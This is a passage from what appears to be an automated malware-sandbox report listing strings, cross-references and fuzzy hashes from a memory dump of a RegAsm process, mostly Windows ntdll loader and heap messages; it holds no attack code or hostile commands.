                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                              • API String ID: 0-1700792311
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-792281065
                                                              Strings
                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 02F89A01
                                                              • apphelp.dll, xrefs: 02F26496
                                                              • LdrpInitShimEngine, xrefs: 02F899F4, 02F89A07, 02F89A30
                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 02F89A2A
                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 02F899ED
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 02F89A11, 02F89A3A
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-204845295
                                                              Strings
                                                              • Loading import redirection DLL: '%wZ', xrefs: 02FA8170
                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 02FA81E5
                                                              • LdrpInitializeProcess, xrefs: 02F6C6C4
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 02FA8181, 02FA81F5
                                                              • LdrpInitializeImportRedirection, xrefs: 02FA8177, 02FA81EB
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 02F6C6C3
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-475462383
                                                              Strings
                                                              • SXS: %s() passed the empty activation context, xrefs: 02FA2165
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 02FA2180
                                                              • RtlGetAssemblyStorageRoot, xrefs: 02FA2160, 02FA219A, 02FA21BA
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 02FA21BF
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 02FA2178
                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 02FA219F
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                              • API String ID: 0-861424205
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                              • API String ID: 0-379654539
                                                              Strings
                                                              • @, xrefs: 02F68591
                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 02F6855E
                                                              • LdrpInitializeProcess, xrefs: 02F68422
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 02F68421
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1918872054
                                                              Strings
                                                              • .Local, xrefs: 02F628D8
                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 02FA21D9, 02FA22B1
                                                              • SXS: %s() passed the empty activation context, xrefs: 02FA21DE
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 02FA22B6
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                              • API String ID: 0-1239276146
                                                              Strings
                                                              • RtlDeactivateActivationContext, xrefs: 02FA3425, 02FA3432, 02FA3451
                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 02FA342A
                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 02FA3456
                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 02FA3437
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                              • API String ID: 0-1245972979
                                                              Strings
                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 02F9106B
                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 02F910AE
                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 02F91028
                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 02F90FE5
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                              • API String ID: 0-1468400865
                                                              Strings
                                                              • apphelp.dll, xrefs: 02F52462
                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 02F9A992
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 02F9A9A2
                                                              • LdrpDynamicShimModule, xrefs: 02F9A998
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-176724104
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-4253913091
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                              • API String ID: 0-2779062949
                                                              Strings
                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 02FA82DE
                                                              • Failed to reallocate the system dirs string !, xrefs: 02FA82D7
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 02FA82E8
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1783798831
                                                              Strings
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 02FEC1C5
                                                              • @, xrefs: 02FEC1F1
                                                              • PreferredUILanguages, xrefs: 02FEC212
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                              • API String ID: 0-2968386058
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                              • API String ID: 0-1373925480
                                                              Strings
                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 02FB4888
                                                              • LdrpCheckRedirection, xrefs: 02FB488F
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 02FB4899
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-3154609507
                                                              Strings
                                                              • LdrpInitializationFailure, xrefs: 02FB20FA
                                                              • Process initialization failed with status 0x%08lx, xrefs: 02FB20F3
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 02FB2104
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2986994758
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: #%u
                                                              • API String ID: 48624451-232158463
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `$`
                                                              • API String ID: 0-197956300
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Legacy$UEFI
                                                              • API String ID: 2994545307-634100481
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$MUI
                                                              • API String ID: 0-17815947
                                                              Strings
                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 02F3063D
                                                              • kLsE, xrefs: 02F30540
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                              • API String ID: 0-2547482624
                                                              Strings
                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 02F3A309
                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 02F3A2FB
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                              • API String ID: 0-2876891731
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Cleanup Group$Threadpool!
                                                              • API String ID: 2994545307-4008356553
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: MUI
                                                              • API String ID: 0-1339004836
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: GlobalTags
                                                              • API String ID: 0-1106856819
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: EXT-
                                                              • API String ID: 0-1948896318
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryHash
                                                              • API String ID: 0-2202222882
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2abf9be42caba5661a5d9ef519769db7cb3e163d5b5495710cad1b60d2176c1d
                                                              • Instruction ID: d258e786b208ffbce147f844f092e42d824c63586e9f5ebf7bcc468dc63cacef
                                                              • Opcode Fuzzy Hash: 2abf9be42caba5661a5d9ef519769db7cb3e163d5b5495710cad1b60d2176c1d
                                                              • Instruction Fuzzy Hash: D6910336E006158BEB24DB19C944B7DBBA2FF84794F064069EB05DB390EFB8D941CB91
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cde15c23e531d355f7002a8cfd9a7cbd7ca9036a0f08e576f86a0a059017e77a
                                                              • Instruction ID: a0420b502b1ae881c74ba0c7debbbba23ed3ccf213bf9e36a0c568af1e288f27
                                                              • Opcode Fuzzy Hash: cde15c23e531d355f7002a8cfd9a7cbd7ca9036a0f08e576f86a0a059017e77a
                                                              • Instruction Fuzzy Hash: 77818176A00609AFDB21CFA5C885FEEBBFAFF48384F144429E655A7250D770AC05CB60
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8f0f0777d1cb729aba78635dc27eb230d68fc830dc624e739a63c5fd62a87b61
                                                              • Instruction ID: 3df7ae987e7b09cbd52f235e9475a8f10cb09793f6b8946fb5aa88b059cf9d29
                                                              • Opcode Fuzzy Hash: 8f0f0777d1cb729aba78635dc27eb230d68fc830dc624e739a63c5fd62a87b61
                                                              • Instruction Fuzzy Hash: 8E71E175D02269DBDB25CF59C890BBEBBB5FF59780F14411BEA42AB350DB749800CBA0
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4cbd7ef2dd4b63a41cada88ae856a4d8b9775f4da2d7dd0f40c81223636a5fe5
                                                              • Instruction ID: 320b5a748aeeb7d62a025ce432eba0e2c5e9e2afd4d20978bf4c42e958a9fe2f
                                                              • Opcode Fuzzy Hash: 4cbd7ef2dd4b63a41cada88ae856a4d8b9775f4da2d7dd0f40c81223636a5fe5
                                                              • Instruction Fuzzy Hash: 00717070D01208DFCF21EF95D940A5ABBF9EB91794F20415EE712A7298C7BA9900DF54
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ad9740dd002c15cd9892a9f97a489b56f98491b13fc5c459f4b55fa2fac76857
                                                              • Instruction ID: 17cf40b32af4e3689aa94cae4b49a74a7a9b10cd807bbc99207536a3695d0cc2
                                                              • Opcode Fuzzy Hash: ad9740dd002c15cd9892a9f97a489b56f98491b13fc5c459f4b55fa2fac76857
                                                              • Instruction Fuzzy Hash: 42719C71A046418FD711DF28C880B2ABBE6FF84394F0485AAFA99CB751DBB4DC45CB91
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a1c33f1540676e7383635f03c8a085b80dc56531180aca0e4f188a4222807ea0
                                                              • Instruction ID: 1f82dbfa2ef4aaec118d3df85718f528dc6c0bb4d4125c03cbdd231054a508c5
                                                              • Opcode Fuzzy Hash: a1c33f1540676e7383635f03c8a085b80dc56531180aca0e4f188a4222807ea0
                                                              • Instruction Fuzzy Hash: E671E032604602AFD7319F14CE44F66B7AAEF847A4F24442CE756D72A0DB75E944CB50
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                              • Instruction ID: 5e00b13767b58bc1cb09607ae888c4cb4423783b05b3490f6e3a8136496d4f37
                                                              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                              • Instruction Fuzzy Hash: 4F716A71E00609AFCB11DFA9CD84AEEBBB9FF48784F104569E605A7250DB34EA41CF90
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4b6a0aa8954dc369f84257856887fd8c09e4e24fdbdae64ada36ac3c3a3f4034
                                                              • Instruction ID: e01ef58381c2cd4624a01f10ce6d2508cc174791db24441b8d3fac42af49cd65
                                                              • Opcode Fuzzy Hash: 4b6a0aa8954dc369f84257856887fd8c09e4e24fdbdae64ada36ac3c3a3f4034
                                                              • Instruction Fuzzy Hash: 4F713C71E01609AFEB15DF94CC81FEEBBB9FB04350F104169EA15A7290D774AA05CF90
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9d9295bda409f992b9687e837dce665db68a1ebe3ec915b46ee6a92797d07301
                                                              • Instruction ID: 56ca905098b3779396dee732eb70d86d19e762fe131b5de3137b4c65752d64d1
                                                              • Opcode Fuzzy Hash: 9d9295bda409f992b9687e837dce665db68a1ebe3ec915b46ee6a92797d07301
                                                              • Instruction Fuzzy Hash: 0C51D172904711AFDB12DE68C984E5BB7E9EFC4794F010929BB42DB260D771ED04CBA2
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0d61689fb9b2ecd632b8735fe827dd85cbe484d74b344c126f34f37d858b7f48
                                                              • Instruction ID: 04c3299ce2f23943f6e218bce47f521de94d07c377da3038a8308544c522b823
                                                              • Opcode Fuzzy Hash: 0d61689fb9b2ecd632b8735fe827dd85cbe484d74b344c126f34f37d858b7f48
                                                              • Instruction Fuzzy Hash: B451BE70900704DFD720DF66C980BABFBFABF45794F14461ED296976A0C7B0A942CB50
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e4a7d3feb594aa9fc1ff09508e0a11c1b0f10decedb011bd1a965b28db6c719
                                                              • Instruction ID: b150dec67d1159f616f6970cc1aa28a29fd22070f27f7771ed87a7144c66982c
                                                              • Opcode Fuzzy Hash: 8e4a7d3feb594aa9fc1ff09508e0a11c1b0f10decedb011bd1a965b28db6c719
                                                              • Instruction Fuzzy Hash: 8B513876600A04DFDB21EF65C994FAAB7EAFB08784F50046AE74197660DB74AA40CB50
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a75b410053a34239220ca3101a1ca44c533e147ba56450bc17a8e0a5266a6935
                                                              • Instruction ID: 2fb37b4d63a371ec70c98adaf2619bd1163f12ede0559997db741b262089402f
                                                              • Opcode Fuzzy Hash: a75b410053a34239220ca3101a1ca44c533e147ba56450bc17a8e0a5266a6935
                                                              • Instruction Fuzzy Hash: 2B5157726083418FD754DF29D880A6BB7E6BFC8388F48492EF689C7250EB30D905CB52
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                              • Instruction ID: ff2b124a572a5acf3c23e9b93191de7eca3eb86bc9d5a73e677d74a64be29e9d
                                                              • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                              • Instruction Fuzzy Hash: 86515F71E0022DABDF15DF94D840BEEBBB5AF45798F0440A9EB01AB240D774E985CFA4
                                                              Memory Dump Source
